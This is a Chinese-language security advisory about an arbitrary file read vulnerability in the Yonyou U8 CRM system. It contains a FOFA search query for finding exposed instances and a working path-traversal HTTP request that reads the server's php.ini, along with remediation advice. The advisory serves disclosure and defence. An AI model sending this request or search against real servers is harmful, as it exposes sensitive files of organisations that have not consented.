关于用友 U8 CRM客户关系管理系统任意文件读取漏洞预警¶
漏洞描述¶
用友 U8 CRM是一款综合性的客户关系管理软件,旨在帮助企业建立和维护与客户之间的良好关系。它提供了全面的功能,包括销售管理、市场营销、客户服务和分析报告等。该系统支持多种行业和企业规模,并具有灵活可定制的特点,可以根据企业的需求进行个性化配置。该CRM系统软件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件。
影响范围¶
用友 U8 CRM客户关系管理系统
漏洞状态¶
| 漏洞细节 | 漏洞POC | 漏洞EXP | 在野利用 |
|---|---|---|---|
| 是 | [已公开] | [已公开] | [已知] |
风险等级¶
| 维度 | 评价 |
|---|---|
| 威胁等级 | 【高危】 |
| 影响面 | 【广】 |
| 攻击者价值 | 【中】 |
| 利用难度 | 【低】 |
漏洞复现¶
FOFA:body="用友U8CRM"
POC/EXP:
GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1 Host: 127.0.0.1:8072 Cache-Control: max-age=0 DNT: 1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=bk3lv0b1a2gq9fdqb9jf2j86f7 Connection: close


修复方案¶
官方修复:
1、检查用户输入:在处理用户输入时,应该对输入进行严格的验证和过滤,避免让恶意输入通过应用程序。
2、配置文件权限:在服务器上设置文件和目录的权限,确保只有授权的用户才能够读取敏感的文件。
3、使用白名单:为了防止攻击者尝试读取任意文件,可以使用白名单机制来限制应用程序可以访问的文件列表。
4、具体修复方法请关注用友官方修改补丁为准。